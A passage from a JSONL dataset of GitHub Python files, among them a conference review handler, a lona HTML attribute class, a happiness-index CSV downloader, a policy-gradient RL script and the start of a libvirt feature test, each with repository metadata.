sorted\n\n def get(self):\n if not (self.session.has_key(\"crrt_conference\")):\n logging.debug(\"Conference key session variable missing\")\n return\n\n crrt_conf = ndb.Key(urlsafe=self.session[\"crrt_conference\"]).get()\n\n self.make_page(crrt_conf)\n\n def submit_decisions(self, review_round):\n if not (self.session.has_key(\"crrt_conference\")):\n logging.debug(\"Conference key session variable missing\")\n return\n\n roundreviews.submit_decisions(\n ndb.Key(urlsafe=self.session[\"crrt_conference\"]),\n self.request.get(\"tracklist\"),\n review_round,\n self.request)\n\n def decline_no_decisions(self, review_round):\n self.submit_decisions(review_round)\n roundreviews.mass_track_change(\n ndb.Key(urlsafe=self.session[\"crrt_conference\"]),\n self.request.get(\"tracklist\"),\n review_round,\n \"No decision\",\n \"Decline\")\n\n def post(self):\n review_round = int(self.request.get(\"review_round\"))\n if self.request.get(\"SubmitDecision\"):\n self.submit_decisions(review_round)\n if self.request.get(\"DeclineNoDecisions\"):\n self.decline_no_decisions(review_round)\n\n self.redirect(\"/classic_review_decisions?track=\" +\n self.request.get(\"tracklist\") +\n \"&round=\" + str(review_round))\n","repo_name":"allankellynet/mimas","sub_path":"subreview_lib/classicreviewdecisionpage.py","file_name":"classicreviewdecisionpage.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28658371325","text":"def operate(a, op, b):\n    if op == 0:\n        return a+b\n    elif op == 1:\n        return a-b\n    elif op == 2:\n        return a*b\n    else:\n        if a >= 0:\n            return a//b\n        else:\n            return (-a)//b * -1\n\n\ndef dfs(n, s):\n    global minA, maxA\n    if n == N:\n        minA = min(minA, s)\n        maxA = max(maxA, s)\n        return\n    for i in range(4):\n        if op[i]:\n            op[i] -= 1\n            dfs(n+1, operate(s, i, A[n]))\n            op[i] += 1\n\n\nN = int(input())\nA = [*map(int, input().split())]\nop = [*map(int, input().split())]\nminA, maxA = 1e9, -1e9\ndfs(1, A[0])\nprint(maxA, minA, sep='\\n')\n\n# Apparently building the expression and using eval() also passes (judging by the C++14 time limit).. accepted..","repo_name":"hjle2/Algorithm","sub_path":"baekjoon/백트래킹/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13917647459","text":"#-*- coding: utf-8 -*-\n\n# /usr/include/linux/fadvise.h\nPOSIX_FADV_SEQUENTIAL = 2\nPOSIX_FADV_DONTNEED = 4\n\nlibc = offset = length = None\n\ndef fadvise(fd, seq=False, drop_cache=False):\n\t'Avoid filling disk cache with discardable data.'\n\tglobal libc, offset, length\n\tif not libc: # only import and initialize ctypes if used\n\t\timport ctypes, ctypes.util\n\t\tlibc = ctypes.CDLL(ctypes.util.find_library('c'))\n\t\toffset = length = ctypes.c_uint64(0)\n\tif not isinstance(fd, (int, long)): fd = fd.fileno()\n\n\t# These don't work (EINVAL) when or'ed\n\tif seq: libc.posix_fadvise(fd, offset, length, POSIX_FADV_SEQUENTIAL)\n\tif drop_cache: libc.posix_fadvise(fd, offset, length, POSIX_FADV_DONTNEED)\n","repo_name":"mk-fg/fs-bitrot-scrubber","sub_path":"fs_bitrot_scrubber/fadvise.py","file_name":"fadvise.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"69"}
+{"seq_id":"4067682597","text":"from lona.protocol import OPERATION, PATCH_TYPE\n\n\nclass AttributeDict:\n PATCH_TYPE = PATCH_TYPE.ATTRIBUTES\n\n def __init__(self, node, *args, **kwargs):\n self._node = node\n self._attributes = dict(*args, **kwargs)\n\n # dict helper #############################################################\n def keys(self):\n with self._node.lock:\n return self._attributes.keys()\n\n def items(self):\n with self._node.lock:\n return self._attributes.items()\n\n def pop(self, name):\n with self._node.lock:\n attribute = self._attributes.pop(name)\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.REMOVE,\n payload=[\n name,\n ],\n )\n\n return attribute\n\n def clear(self):\n with self._node.lock:\n if not self._attributes:\n return\n\n self._attributes.clear()\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.CLEAR,\n payload=[],\n )\n\n def get(self, *args, **kwargs):\n with self._node.lock:\n return self._attributes.get(*args, **kwargs)\n\n def update(self, value):\n if not isinstance(value, dict):\n raise ValueError('dict required')\n\n with self._node.lock:\n for key, value in value.items():\n self[key] = value\n\n def __getitem__(self, name):\n with self._node.lock:\n return self._attributes[name]\n\n def __setitem__(self, name, value, issuer=None):\n if not isinstance(value, (int, bool, float, str)):\n raise ValueError('unsupported type: {}'.format(type(value)))\n\n if name in ('id', 'class', 'style'):\n raise RuntimeError(\n \"Node.attributes['{}'] is not supported. \"\n 'Use Node.{}{} instead.'.format(\n name, name, '_list' if name != 'style' else '')\n )\n\n with self._node.lock:\n if name in self._attributes and self._attributes[name] == value:\n return\n\n self._attributes[name] = value\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.SET,\n payload=[\n name,\n value,\n ],\n issuer=issuer,\n )\n\n def __delitem__(self, name):\n with self._node.lock:\n del self._attributes[name]\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.REMOVE,\n payload=[\n name,\n ],\n )\n\n def __eq__(self, other):\n with self._node.lock:\n if isinstance(other, self.__class__):\n other = other._attributes\n\n return self._attributes == other\n\n def __iter__(self):\n with self._node.lock:\n return self._attributes.__iter__()\n\n def __bool__(self):\n with self._node.lock:\n return bool(self._attributes)\n\n # serialisation ###########################################################\n def _reset(self, value):\n if not isinstance(value, dict):\n raise ValueError('unsupported type')\n\n for k, v in value.items():\n if not isinstance(v, (int, bool, float, str)):\n raise ValueError('unsupported type')\n\n if k in ('id', 'class', 'style'):\n raise RuntimeError(\n \"Node.attributes['{}'] is not supported. 
\"\n                    'Use Node.{}{} instead.'.format(\n                        k, k, '_list' if k != 'style' else '')\n                )\n\n        with self._node.lock:\n            self._attributes = value\n\n            self._node.document.add_patch(\n                node_id=self._node.id,\n                patch_type=self.PATCH_TYPE,\n                operation=OPERATION.RESET,\n                payload=[\n                    dict(value),\n                ],\n            )\n\n    def _serialize(self):\n        return dict(self._attributes)\n\n    # string representation ###################################################\n    def to_attribute_string(self, skip_value=False):\n        with self._node.lock:\n            string = []\n\n            for key, value in self._attributes.items():\n                if skip_value and key == 'value':\n                    continue\n\n                string.append('{}=\"{}\"'.format(key, value))\n\n            return ' '.join(string)\n\n    def to_sub_attribute_string(self):\n        with self._node.lock:\n            string = []\n\n            for key, value in self._attributes.items():\n                string.append('{}: {}'.format(key, value))\n\n            return '; '.join(string)\n\n    def __repr__(self):\n        return '<AttributeDict({})>'.format(repr(self._attributes))\n\n\nclass StyleDict(AttributeDict):\n    PATCH_TYPE = PATCH_TYPE.STYLE\n\n    def __repr__(self):\n        return '<StyleDict({})>'.format(repr(self._attributes))\n","repo_name":"simrit1/lona","sub_path":"lona/html/attribute_dict.py","file_name":"attribute_dict.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"21763729292","text":"# %%\n##\nimport calendar as cal\nfrom datetime import date as dt\nimport re\nimport string as st\nfrom collections import Counter\nimport math\nimport random\nimport pickle\nimport json\n\n# %%\n##\ns = cal.calendar(2020)\n\nprint(s)\n\n# %%\n##\ns = cal.month(2020, 6)\n\nprint(s)\n\n# %%\n##\nd_1 = dt(2020, 6, 1)\nd_2 = dt(2020, 7, 18)\n\nprint(d_2 - d_1)\n\n# %%\n##\nstring = 'Python 3.8'\n\np = re.compile(pattern=r\"\\d\").findall(string)\n\nprint(p)\n\n# different solution\n\nresult = re.findall(pattern=r\"\\d\", string=string)\nprint(result)\n\n# %%\n##\nstring = '!@#$%^&45wc'\n\nres = re.findall(r\"\\w\", string=string)\n\nprint(res)\n\n# %%\n##\nraw_text = \"Wyślij email na adres: info@template.com lub sales-info@template.it\"\n\nres = re.findall(r\"[\\w.-]+@[\\w.-]+\", raw_text)\n\nprint(res)\n\n# %%\n##\ntext = 'Programowanie w języku Python - od A do Z'\n\nres = re.split(r\"\\s+\", text)\n\nprint(res)\n\n# %%\n##\nres = st.ascii_letters\n\nprint(res)\n\n# %%\n##\nitems = ['YES', 'NO', 'NO', 'YES', 'EMPTY', 'YES', 'NO']\n\nres = Counter(items)\n\nprint(res)\n\n# or\ncounter = Counter()\nitems = ['YES', 'NO', 'NO', 'YES', 'EMPTY', 'YES', 'NO']\nfor item in items:\n counter[item] += 1\nprint(counter)\n\n\n# %%\n##\n\n\ndef sigmoid(x):\n func = 1 / (1 + math.exp(-x))\n return func\n\n\n# %%\n##\n\n\nrandom.seed(12)\n\nitems = ['python', 'java', 'sql', 'c++', 'c']\n\nprint(random.choice(items))\n\n# %%\n##\n\n\nrandom.seed(15)\n\nitems = ['python', 'java', 'sql', 'c++', 'c']\nrandom.shuffle(items)\n\nprint(items)\n\n# %%\n##\nids = ['001', '003', '011']\n\npickle.dump(ids, open('part_25/data.pickle', 'wb'))\n\n# %%\n##\nstocks = {'PLW': 360.0, 'TEN': 320.0, 'CDR': 329.0}\n\nprint(json.dumps(stocks, sort_keys=True, indent=4))\n","repo_name":"LukasKodym/python_exercises","sub_path":"part_25/builtin_packs.py","file_name":"builtin_packs.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2055979603","text":"import csv\n\ndef setup():\n global years, scores, margin, graphHeight, positions, title\n size(1000, 200)\n background(20)\n fill(255)\n title = \"Average math scores for 3rd graders by year.\"\n years = []\n scores = []\n margin = 40\n positions = []\n graphHeight = (height - margin) - margin\n positions = processData(filename=\"math_scores.csv\")\n drawData(positions, vertices=True,edges=False,grooves=True)\n drawCurves(vList=positions)\n \ndef processData(filename):\n global overallMin, overallMax, xSpacer\n f = open(filename, \"r\")\n with f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i > 0:\n years.append(int(row[1]))\n scores.append(int(row[2]))\n overallMin = min(scores) # What does Cairo say?\n overallMax = max(scores)\n xSpacer = (width - margin - margin) / (len(years) - 1)\n for i in range(0, len(scores)):\n adjScore = map(scores[i], overallMin, overallMax, 0, graphHeight)\n yPos = height - margin - adjScore\n xPos = margin + (xSpacer * i)\n positions.append(PVector(xPos, yPos))\n return positions\n\ndef drawData(positions, vertices=False,edges=False,grooves=False):\n for i in range(0, len(positions)):\n textSize(12)\n textAlign(CENTER,CENTER)\n text(years[i], positions[i].x, height - margin + 20)\n if grooves:\n # draw grooves\n stroke(200, 100)\n strokeWeight(1)\n line(positions[i].x, margin, positions[i].x, height - margin)\n if vertices:\n # Draw the vertices\n stroke(200, 100)\n circle(positions[i].x, positions[i].y, 7)\n if edges:\n # Draw the edges\n if(i > 0):\n # stroke(200)\n strokeWeight(2)\n line(positions[i].x, positions[i].y,\n positions[i - 1].x, positions[i - 1].y)\n textSize(14)\n textAlign(LEFT,CENTER)\n text(overallMax, 5, margin)\n text(overallMin, 5, height - margin)\n textAlign(RIGHT,BOTTOM)\n text(title, width-margin,margin/2)\n \ndef drawCurves(vList):\n # Draw curved lines\n stroke(23, 225, 0)\n strokeWeight(3)\n noFill()\n beginShape()\n # start point\n curveVertex(vList[0].x,vList[0].y)\n for i in range(0,len(vList)):\n curveVertex(vList[i].x,vList[i].y)\n # end point\n curveVertex(vList[-1].x,vList[-1].y)\n endShape()\n","repo_name":"untr-aditi-onal/Python-Vis","sub_path":"mathscores/mathscores.pyde","file_name":"mathscores.pyde","file_ext":"pyde","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9418011898","text":"# Assignment 12.\n# Extend the happiness.py program so that it includes the following:\n# 1. The downloaded happiness-index data must\n# be written to a csv file.\n# 2. The program must contain a function to select the\n# happiness values for given dates.\n# The dates must be specifiable in a form similar to \"Index slices\".\n# German Jordi Arreortua Reyes\n# 07/06/2022\n# ! ./venv/bin/python3.8\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload world happiness time series from hedonometer project.\nSee https://hedonometer.org/timeseries/en_all/?from=2020-08-24&to=2022-02-23\nCreated on Tue Feb 24 15:35:23 2022\n\n@author: Feliú Sagols\nCDMX\n\"\"\"\n\nimport csv\nimport datetime\n# import pandas as pd\nimport requests\n# import psycopg2\n\nimport loggers\n\nTIMESERIES_DATABASE = \"ts_db\"\n\nglobal LOGGER\n\n\n# def last_available_date():\n#     \"\"\"\n#     Returns the newest record base_date in happiness table\n#     \"\"\"\n#     conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n#                             TIMESERIES_DATABASE)\n#     cur = conn.cursor()\n#     cur.execute(\"\"\"\n#         select date_\n#         from happiness\n#         order by date_ desc\n#         limit 1;\n#         \"\"\")\n#     date_ = cur.fetchone()[0]\n#     conn.close()\n#     return date_\n\n\n# def get_happiness_ts(last_date, last_days):\n#     \"\"\"\n#     Returns the happiness time series.\n#\n#     Parameters\n#     ----------\n#     last_date : datetime.pyi\n#         Last base_date in the time period to download.\n#     last_days:\n#         Number of days previous to the last base_date to download.\n#\n#     Examples\n#     --------\n#     >>> get_happiness_ts(datetime.datetime(2022, 2, 26), 700)\n#\n#     Returns\n#     -------\n#     A dataframe with the time series.\n#     \"\"\"\n#     conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n#                             TIMESERIES_DATABASE)\n#     cur = conn.cursor()\n#     cur.execute(\n#         \"\"\"\n#         select date_, happiness\n#         from happiness\n#         where date_ <= %(last_date)s\n#         order by date_ desc limit %(last_days)s;\n#         \"\"\", {\n#             'last_date': last_date,\n#             'last_days': last_days\n#         })\n#     answer = cur.fetchall()\n#     answer.reverse()\n#     answer = [[a[0], a[1]] for a in answer]\n#     df = pd.DataFrame(data=answer, columns=['base_date', 'happiness'])\n#     df.set_index('base_date', inplace=True)\n#     return df\n\ndef download_happiness(start_date, records):\n    \"\"\"\n    Download happiness records from the url below and write them to the\n    data.csv file.\n\n    Parameters\n    ----------\n    start_date : datetime.pyi\n        Initial downloading base_date.\n    records : int\n        Maximum number of records after start_date to download.\n    \"\"\"\n\n    LOGGER.debug(\"Downloading happiness time series.\")\n    data_json = requests.get(\n        'https://hedonometer.org/api/v1/happiness/?format=json&timeseries__'\n        f'title=en_all&date__gte='\n        f'{start_date.strftime(\"%Y-%m-%d\")}&limit={records}')\n    data = data_json.json()\n    data = [[\n        datetime.datetime.strptime(d['date'], \"%Y-%m-%d\"), d['frequency'],\n        float(d['happiness'])\n    ] for d in data['objects']]\n    # conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n    #                         TIMESERIES_DATABASE)\n    LOGGER.info(\"Storing happiness time series.\")\n    # cur = conn.cursor()\n    # cur.executemany(\n    #     \"\"\"\n    #     insert into happiness\n    #     values (%s, %s, %s)\n    #     on conflict (date_)\n    #     do nothing;\n    #     \"\"\", data)\n    # conn.commit()\n    # conn.close()\n    data = sorted(data, key=lambda a: a[0])\n\n    with open(\"data.csv\", \"w\", newline=\"\") as archivo:\n        archivo_writer = csv.writer(archivo, delimiter=',', quotechar='\"',\n                                    quoting=csv.QUOTE_MINIMAL)\n        archivo_writer.writerow(['date', 'frequency', 'happiness'])\n        for elemento in data:\n            archivo_writer.writerow(elemento)\n        archivo.close()\n\n\ndef retrieve_happiness(intervalo_fechas):\n    \"\"\"\n    Select the happiness values for the given dates.\n    :param intervalo_fechas: list of date ranges, in a form similar to \"Index slices\".\n    \"\"\"\n    for intervalo in intervalo_fechas:\n        fecha_ini = datetime.datetime.strptime(intervalo[0], \"%Y-%m-%d\")\n\n        if len(intervalo) > 1:\n            fecha_ter = datetime.datetime.strptime(intervalo[1], \"%Y-%m-%d\")\n        else:\n            fecha_ter = fecha_ini\n\n        if len(intervalo) > 2:\n            salto = intervalo[2]\n        else:\n            salto = 1\n\n        contador = salto\n        with open(\"data.csv\", \"r\") as csv_file:\n            csv_reader = csv.DictReader(csv_file, delimiter=',')\n            print(f'\\t Intervalo de fechas: {intervalo}.')\n            for row in csv_reader:\n                if fecha_ini <= \\\n                        datetime.datetime.strptime(row['date'], '%Y-%m-%d %H:%M:%S') <= \\\n                        fecha_ter:\n                    if contador == salto:\n                        print(f'\\t date: {row[\"date\"]}, frequency: {row[\"frequency\"]},'\n                              f' happiness: {row[\"happiness\"]}')\n                        contador = 0\n                    contador += 1\n\n\nif __name__ == \"__main__\":\n    LOGGER = loggers.define_logger(\"happiness.log\")\n    date = datetime.datetime(2022, 1, 1)\n    download_happiness(date, 5000)\n\nretrieve_happiness([['2022-01-01', '2022-05-24', 3], ['2022-02-01', '2022-02-07']])\n# retrieve_happiness([['2022-01-01', '2022-03-27', 6],\n#                     ['2022-02-01', '2022-02-07', 2], ['2022-04-01']])\n","repo_name":"German-Jordi/Programacion_Avanzada","sub_path":"Tarea_12_German_Jordi_Arreortua.py","file_name":"Tarea_12_German_Jordi_Arreortua.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37614626920","text":"# Vanilla policy gradient (VPG) using Pytorch, continuous action space\n# VPG Algorithm can be found in https://spinningup.openai.com/en/latest/algorithms/vpg.html, http://joschu.net/docs/thesis.pdf\n# Intrinsic Curiosity Module (ICM): https://arxiv.org/abs/1705.05363\n# MountainCarContinuous-v0 in Gym environment\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cpu\")\n\n# policy network - gaussian mean and std (output=2)\n# gaussian mean (output=1)\nclass policy_network(nn.Module):\n def __init__(self, input=4, hidden=64, output=2):\n super(policy_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# state-value estimator (critic)\nclass state_value_network(nn.Module):\n def __init__(self, input=4, hidden=64, output=1):\n super(state_value_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# forward dynamics model - s_{t+1} = f(s_t, a_t)\nclass forward_dynamics_network(nn.Module):\n def __init__(self, input=5, hidden=64, output=4):\n super(forward_dynamics_network, self).__init__()\n self.fc1 = nn.Linear(input, hidden)\n self.fc2 = nn.Linear(hidden, hidden)\n self.fc3 = nn.Linear(hidden, output)\n\n def forward(self, input):\n x = F.relu(self.fc1(input))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\ndef choose_action(ob):\n # choose action using current policy pi (continuous action space)\n # assume the variance of Gaussian policy \\sigma = 1.0\n mean_a = pi(torch.tensor(ob, dtype=torch.float32).to(device)).detach()\n mean_a = mean_a.cpu().numpy()\n a = np.random.normal(loc=mean_a, scale=1.0)\n # if a < 0:\n # a_env = 0\n # else:\n # a_env = 1\n return np.array(a)\n\ndef compute_advantage(rewards, states, gamma):\n # get returns of states from a trajectory\n # R_t = r_t + gamma * r_{t+1} + gamma^2 * r_{t+2} + ...\n returns = rewards.copy()\n advs = rewards.copy()\n states_ep = states.copy()[-len(rewards):]\n for i in reversed(range(len(returns)-1)):\n r = returns[i] + gamma * returns[i+1]\n returns[i] = r\n states_ep = torch.tensor(states_ep, dtype=torch.float32).to(device)\n returns = torch.tensor(returns, dtype=torch.float32).to(device)\n advs = returns - V(states_ep).squeeze(1)\n # advs = returns\n return advs\n\ndef compute_epsilon_adv(states, epsilon):\n # get another adv according to the discrepancy of current state to its average\n states_o = states.copy()\n states = np.array(states)\n means = []\n advs = []\n for i in range(len(states[0])):\n mean_ = np.mean(states[:,i])\n means.append(mean_)\n for i in range(len(states_o)):\n a = states_o[i]\n e = a - means\n cur_error = sum(t*t for t in e)\n advs.append(cur_error)\n if np.random.uniform() < epsilon:\n value = [t * 100 for t in advs]\n else:\n value = [t/t for t in advs]\n return value\n\ndef intrinsic_r(ob, a, ob_):\n # calculated the intrinsic reward as prediction error\n loss = nn.MSELoss(reduction='sum').to(device)\n input_tensor = torch.tensor(np.concatenate((ob, a)), 
dtype=torch.float32).to(device)\n ob_tensor = torch.tensor(ob, dtype=torch.float32).to(device)\n ob_p = forward_net(input_tensor).detach()\n pred_error = loss(ob_p, ob_tensor)\n return pred_error.item() # as a number\n \ndef model_validate():\n ep_reward = 0\n ob = env.reset()\n done = False\n while not done:\n env.render() \n a = choose_action(ob)\n ob_, r, done, _ = env.step(a)\n ep_reward += r\n ob = ob_\n return ep_reward\n\nK = 10000\nBATCH_SIZE = 500\nGAMMA = 0.95\nETA = 0.9 # regularizer of loss function\nLEARNING_RATE = 0.0005\ndecay = 0.995\n\nenv = gym.make('MountainCarContinuous-v0')\n\nn_actions = env.action_space.shape[0]\n# n_actions = 1\nstate_length = env.observation_space.shape[0]\n\n# initialize policy network, forward dynamics network and state-value network\npi = policy_network(input=state_length, output=1).to(device)\n# forward_net = forward_dynamics_network(input=(n_actions+state_length), output=state_length).to(device)\nV = state_value_network(input=state_length).to(device)\n\n# define optimizers\n# params = list(pi.parameters()) + list(forward_net.parameters())\n# global_optimizer = torch.optim.Adam(params, lr=LEARNING_RATE)\nV_optimizer = torch.optim.Adam(V.parameters(), lr=LEARNING_RATE)\npi_optimizer = torch.optim.Adam(pi.parameters(), lr=LEARNING_RATE)\n# forward_net_optimizer = torch.optim.Adam(forward_net.parameters(), lr=LEARNING_RATE)\n\n# define loss\nloss_MSE = nn.MSELoss(reduction='mean').to(device)\n\ntraining_rewards = []\n\n# epsilon = 1.0\nepsilon = 0.0\n\nfor k in range(K):\n # save trajectories\n states = []\n actions = []\n states_ = []\n advantages = torch.tensor([], dtype=torch.float32).to(device)\n # collect trajectories\n ob = env.reset()\n done = False\n rewards = [] \n step_e = 0 # allowed steps in one episode\n total_r = 0 \n while not done:\n a = choose_action(ob)\n ob_, r_e, done, _ = env.step(a)\n # r_i = intrinsic_r(ob, a, ob_) #add intrinsic reward\n # r = r_i + r_e\n r = r_e\n # save trajectories\n states.append(ob)\n actions.append(a)\n rewards.append(r)\n states_.append(ob_)\n ob = ob_\n step_e += 1\n total_r += r_e\n # calculate discounted return and advantages\n advs = compute_advantage(rewards, states, GAMMA)\n advantages = torch.cat((advantages, advs), 0)\n\n adv_epsilon = compute_epsilon_adv(states, epsilon)\n adv_epsilon = torch.tensor(adv_epsilon, dtype=torch.float32).to(device)\n advantages = torch.mul(advantages, adv_epsilon)\n # epsilon = np.max((epsilon*decay, 0.0001))\n\n states = torch.tensor(states, dtype=torch.float32).to(device)\n actions = torch.tensor(actions, dtype=torch.float32).to(device)\n states_actions = torch.cat((states, actions), 1).to(device)\n states_ = torch.tensor(states_, dtype=torch.float32).to(device)\n # update policy pi and forward dynamics model\n # global_optimizer.zero_grad() \n # log_pi = - (((actions - pi(states)))**2) / 2\n # pi_loss = - torch.sum(torch.mul(log_pi.squeeze(), advantages)) # negative: .backward() use gradient descent, (-loss) with gradient descnet = gradient ascent\n # forward_net_loss = loss_MSE(states_, forward_net(states_actions))\n # global_loss = (1-ETA) * pi_loss + ETA * forward_net_loss\n # global_loss.backward(retain_graph=True)\n # global_optimizer.step()\n #\n pi_optimizer.zero_grad() \n log_pi = - (((actions - pi(states)))**2) / 2\n pi_loss = - torch.sum(torch.mul(log_pi.squeeze(), advantages)) # negative: .backward() use gradient descent, (-loss) with gradient descnet = gradient ascent\n pi_loss.backward(retain_graph=True)\n pi_optimizer.step()\n\n 
V_optimizer.zero_grad() # clear gradient\n v_loss = loss_MSE(advantages, V(states).squeeze())\n v_loss.backward()\n V_optimizer.step()\n\n # validate current policy\n if k % 50 == 0:\n # if k % 500 == 0:\n # training_reward = model_validate()\n # training_rewards.append(training_reward)\n # print('Step: ', k, ' Total reward (model validation): ', training_reward)\n print('Step: ', k, ' Total reward: ', total_r, 'epsilon', epsilon)\n # re-fit state-value network (critic)\n\n training_rewards.append(total_r)\n\n# plt.plot(smooth_reward(ep_rewards, 50))\nplt.plot(training_rewards)\nplt.show()\n\nep_rewards = []\nfor ii in range(10):\n ep_reward = model_validate()\n ep_rewards.append(ep_reward)\nprint('Average rewards of last 10 eps: ', np.mean(ep_rewards))\n# Vanilla policy gradient using Pytorch, continuous action space\n","repo_name":"Wang-Xiaoyang/RL-Implementations","sub_path":"2_vanilla_policy_gradient/idea_trial_backup.py","file_name":"idea_trial_backup.py","file_ext":"py","file_size_in_byte":8367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"14401968629","text":"import random\nfrom mullermsm import muller\nmullerforce = muller.muller_force()\nimport scipy.linalg\nfrom matplotlib.pyplot import *\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument('--dt', dest='dt', type=float, default=0.1)\nparser.add_argument('-n', dest='num_frames', type=int, default=100000)\nparser.add_argument('-o', dest='output', default='pos.npy')\n\nargs = parser.parse_args()\n\nkT = 15.0\ndt = args.dt\nmGamma = 1000.0\ntraj_length = args.num_frames \ninitial_x = [random.uniform(-1.5, 1.2), random.uniform(-0.2, 2)]\npositions = muller.propagate(traj_length, initial_x, kT, dt, mGamma, mullerforce)\n\nnp.save(args.output, positions)\n","repo_name":"rmcgibbo/opt-k","sub_path":"muller/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"74027730459","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn.datasets\n\n\ndef bunch_to_df(bunch):\n df = pd.DataFrame(bunch.data, columns=bunch.feature_names)\n df['target'] = pd.Series(bunch.target)\n return df\n\ndef visualize_df(df):\n pd.plotting.scatter_matrix(df, c=pd.Categorical(df['target']), marker='o')\n plt.show()\n\n\niris = sklearn.datasets.load_iris()\niris_df = bunch_to_df(iris)\n\nprint(iris_df.head())\nprint(iris_df.describe())\n\nvisualize_df(iris_df)\n","repo_name":"fpecek/machine-learning-algorithms","sub_path":"part2/iris_explore.py","file_name":"iris_explore.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30435651759","text":"\"\"\"\nTest libvirt support features in qemu cmdline.\nBTW it not limited to hypervisors CPU/machine features.\n\"\"\"\nimport re\nimport logging as log\nimport platform\n\nfrom virttest import virsh\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest.utils_test import libvirt\n\nfrom virttest import libvirt_version\n\nfrom avocado.utils import process, astring\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef config_feature_pv_eoi(test, vmxml, **kwargs):\n \"\"\"\n Config libvirt VM XML to enable/disable PV EOI feature.\n\n :param vmxml: VMXML instance\n :param kwargs: Function keywords\n :return: Corresponding feature flag in qem cmdline\n \"\"\"\n # This attribute supported since 0.10.2 (QEMU only)\n if not libvirt_version.version_compare(0, 10, 2):\n test.cancel(\"PV eoi is not supported in current\"\n \" libvirt version\")\n qemu_flags = []\n eoi_enable = kwargs.get('eoi_enable', 'on')\n get_hostos_version = astring.to_text(process.run(\"cat /etc/redhat-release\", shell=True).stdout)\n if re.search(r'(\\d+(\\.\\d+)?)', get_hostos_version) is not None:\n hostos_version = float(re.search(r'(\\d+(\\.\\d+)?)', get_hostos_version).group(0))\n if hostos_version < float(8.1):\n if eoi_enable == 'on':\n qemu_flags.append('+kvm_pv_eoi')\n elif eoi_enable == 'off':\n qemu_flags.append('-kvm_pv_eoi')\n else:\n logging.error(\"Invalid value %s, eoi_enable must be 'on' or 'off'\", eoi_enable)\n elif hostos_version > float(8.0):\n if eoi_enable == 'on':\n qemu_flags.append('kvm-pv-eoi=on')\n elif eoi_enable == 'off':\n qemu_flags.append('kvm-pv-eoi=off')\n else:\n logging.error(\"Invalid value %s, eoi_enable must be 'on' or 'off'\", eoi_enable)\n else:\n test.fail(\"Can not decide the expected qemu cmd line because of no expected hostos version\")\n\n # Create features tag if not existed\n if not vmxml.xmltreefile.find('features'):\n vmxml.features = vm_xml.VMFeaturesXML()\n vmxml_feature = vmxml.features\n if vmxml_feature.has_feature('apic'):\n vmxml_feature.remove_feature('apic')\n vmxml_feature.add_feature('apic', 'eoi', eoi_enable)\n vmxml.features = vmxml_feature\n logging.debug(\"Update VM XML:\\n%s\", vmxml)\n expect_fail = False if 'expect_define_vm_fail' not in kwargs \\\n else kwargs['expect_define_vm_fail']\n result = virsh.define(vmxml.xml, debug=True)\n libvirt.check_exit_status(result, expect_fail)\n if expect_fail:\n libvirt.check_result(result, kwargs.get('expected_msg'))\n return\n return qemu_flags\n\n\ndef config_feature_memory_backing(test, vmxml, **kwargs):\n \"\"\"\n Config libvirt VM XML to influence how virtual memory pages are backed\n by host pages.\n\n :param vmxml: VMXML instance\n :param kwargs: Function keywords\n :return: Corresponding feature flag in qem cmdline\n 